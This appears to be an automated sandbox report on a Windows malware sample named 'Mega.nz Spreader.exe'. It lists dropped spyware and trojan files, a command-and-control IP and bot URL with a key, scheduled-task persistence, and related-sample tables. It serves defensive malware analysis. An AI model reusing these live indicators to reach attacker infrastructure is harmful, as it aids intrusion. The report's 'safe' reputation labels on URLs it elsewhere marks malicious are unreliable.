C:\Users\user\AppData\Local\Temp\_MEI66002\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66002\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\api.exe	75%	ReversingLabs	Win32.Spyware.Meduza
C:\Users\user\AppData\Local\Temp\leaf.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\lib.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://www.python.org/download/releases/2.3/mro/.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.openssl.org/H	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://t.me/royalleaksh__	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
http://ns.aap	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://api.ipify.org/5	0%	Avira URL Cloud	safe
https://www.python.org/psf/license/	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
https://bugs.python.org/issue42195.	0%	Avira URL Cloud	safe
http://cacerts.digicert.co	0%	Avira URL Cloud	safe
https://t.me/royalleaks	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	Avira URL Cloud	safe
http://45.159.189.105	0%	Avira URL Cloud	safe
https://api.ipify.org2x	0%	Avira URL Cloud	safe
http://45.159.189.105/bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d	0%	Avira URL Cloud	safe
http://cacerts.digicert.cok	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0263/	0%	Avira URL Cloud	safe
http://cacerts.digicert.coj	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://45.159.189.105/bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ns.aap	api.exe, 00000003.00000003.2260052741.000000000109D000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2259726725.000000000109C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	lib.exe, 00000007.00000002.2081606147.0000026B4DA88000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/royalleaksh__	lib.exe, 00000007.00000002.2083307702.0000026B4FB28000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	lib.exe, 00000007.00000003.2057719232.0000026B4DF02000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2058100018.0000026B4DEC3000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2057579099.0000026B4DF00000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081606147.0000026B4DA00000.00000004.00001000.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2057579099.0000026B4DEC3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2082286891.0000026B4DF4A000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/5	api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/	lib.exe, 00000007.00000002.2085170372.00007FF8A8958000.00000004.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugs.python.org/issue42195.	lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2066562018.0000026B4E184000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065469810.0000026B4E184000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.co	lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.159.189.105	svcupdater.exe, 00000011.00000002.3289763270.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E68000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.openssl.org/H	lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/royalleaks	lib.exe, 00000007.00000003.2074697379.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2083307702.0000026B4FB28000.00000004.00001000.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2082984704.0000026B4E0F2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2069569579.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076202808.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076459074.0000026B4E0F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org2x	api.exe, 00000003.00000002.2260386826.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0205/	lib.exe, 00000007.00000002.2081774717.0000026B4DCB0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000015.00000002.3290066052.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://peps.python.org/pep-0263/	lib.exe, 00000007.00000002.2084707630.00007FF8A88BB000.00000002.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.cok	lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.coj	lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
77.105.147.1	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	true
45.159.189.105	unknown	Netherlands	14576	HOSTING-SOLUTIONSUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1485496
Start date and time:	2024-07-31 18:27:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Mega.nz Spreader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/26@1/3
EGA Information:	Successful, ratio: 72.7%
HCA Information:	Successful, ratio: 65% Number of executed functions: 140 Number of non-executed functions: 254
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target leaf.exe, PID 1784 because it is empty
Execution Graph export aborted for target svcupdater.exe, PID 2568 because it is empty
Execution Graph export aborted for target svcupdater.exe, PID 5084 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Mega.nz Spreader.exe

Simulations

Behavior and APIs

Time	Type	Description
12:28:14	API Interceptor	1x Sleep call for process: leaf.exe modified
12:28:55	API Interceptor	1208x Sleep call for process: svcupdater.exe modified
18:28:39	Task Scheduler	Run new task: eOzNUSwmQA path: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	6OiUEubyA8.msi	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
45.159.189.105	9RDOrudEBB.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
	file.exe	Get hash	malicious	Laplas Clipper, RedLine	Browse	45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
	SXm1px9Zg0.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
	4x8vn385io.exe	Get hash	malicious	MinerDownloader, Laplas Clipper, RedLine, Xmrig	Browse	45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
	iJ6SIwcNf3.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
	YRcS5GIB02.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
	F2u0un5xar.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
	rGn7jtGZE0.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?guid=992547&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
	1DtMIGzTkc.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?guid=980108&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
	iYHZhXtc7t.exe	Get hash	malicious	Laplas Clipper	Browse	45.159.189.105/bot/online?guid=226533&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Revised PI_2024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	rM20240731086.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	104.26.12.205
	QUOTATION.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL- INVOICE-1851940333.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://hughssherika896572396.pages.dev/help/contact/1741368058003682606:4700:310c::ac42:2f19	Get hash	malicious	Unknown	Browse	172.67.74.152
	First order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	DHL-AIR-WAYBILL.bat	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	DHL-INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	DHL-INVOICE-4977440333.bat.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Win32.RATX-gen.24742.674.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.18.35.90
	https://perkinelmer-staffportal-lmofcdoqfmdpzbwhsftftxkbn.vimkesim.com/kiwcmcvfddsvyktlzqmkjcdvu/rueacoiqvefopwnwsizeigdjb/wfvtbncvjymjfkciswigfg11xgen/thgdvnhgkqksinhmhdsinvcbj/pejjvngpzcqurjziqogamybbf/cherylle.galapon/akyfcruunfgxwfrcvhyhatlsy/perkinelmer.com/clyjpwxxuqacstjsckdyzxowj	Get hash	malicious	HTMLPhisher	Browse	172.67.174.145
	New Features.htm	Get hash	malicious	Unknown	Browse	104.21.233.198
	BraveBrowserSetup-BRV010.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://rsms.me/inter/inter.css	Get hash	malicious	Unknown	Browse	104.21.234.234
	BraveBrowserSetup-BRV010.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://proposaljennycarlys.wordpress.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	Remittance Advice.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://kaloramapartnersllc.freshdesk.com/en/support/solutions/articles/154000170546-secure-business-documents	Get hash	malicious	Unknown	Browse	162.159.140.147
	https://securemail.financialservicing.net/s/e?m=ABDdawYvyn1dAC6HzNUN8S5p&c=ABB3ZkmVMmRFCMSUS5X9O3wi	Get hash	malicious	Unknown	Browse	1.1.1.1
PLUSTELECOM-ASRU	hLaUjkQEf9.exe	Get hash	malicious	Atlantida Stealer	Browse	77.105.135.19
	LisectAVT_2403002B_223.exe	Get hash	malicious	Remcos	Browse	77.105.132.92
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	77.105.132.27
	file.exe	Get hash	malicious	RedLine	Browse	77.105.135.107
	MN3OAv98T9.exe	Get hash	malicious	LummaC, Vidar	Browse	77.105.132.27
	file.exe	Get hash	malicious	RedLine	Browse	77.105.135.107
	file.exe	Get hash	malicious	RedLine	Browse	77.105.135.107
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	77.105.133.27
	cKt8r2v7Gy.exe	Get hash	malicious	Unknown	Browse	77.105.133.27
	7dZHSgxz2F.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	77.105.135.87
HOSTING-SOLUTIONSUS	file.exe	Get hash	malicious	Amadey	Browse	185.209.162.226
	http://tqwwwcom.ru/	Get hash	malicious	Unknown	Browse	204.155.30.34
	xworm.exe	Get hash	malicious	Unknown	Browse	185.209.160.70
	Fb9Ff8L4T7	Get hash	malicious	RHADAMANTHYS	Browse	185.209.160.99
	file.exe	Get hash	malicious	Vidar, Xmrig	Browse	185.209.162.208
	file.exe	Get hash	malicious	Vidar, Xmrig	Browse	185.209.162.208
	05F1TC85Up.exe	Get hash	malicious	DanaBot	Browse	45.159.189.76
	05F1TC85Up.exe	Get hash	malicious	DanaBot	Browse	45.159.189.76
	Green.exe	Get hash	malicious	RedLine	Browse	185.209.160.70
	Yellow.exe	Get hash	malicious	RedLine	Browse	185.209.160.70

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Geron Steel-Order-79376- Contract 2025.exe	Get hash	malicious	Remcos	Browse	104.26.12.205
	setup#U67e5#U8be2.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	0242_FV1_241356.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.12.205
	zrpPKBbxN0.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	New _Order_0567___Pdf.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	F_7576419.LnK.lnk	Get hash	malicious	MalLnk	Browse	104.26.12.205
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	104.26.12.205
	1604202412475.exe	Get hash	malicious	GuLoader	Browse	104.26.12.205
	Pagos-Confirming_PDF.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.26.12.205
	Frsteudgaves.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll	Built.exe	Get hash	malicious	Blank Grabber	Browse
	LisectAVT_2403002A_424.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	LisectAVT_2403002A_424.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	LisectAVT_2403002A_441.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_83.exe	Get hash	malicious	Unknown	Browse
	QiYc6RUCv8.exe	Get hash	malicious	Unknown	Browse
	explorer.exe	Get hash	malicious	Nemty	Browse
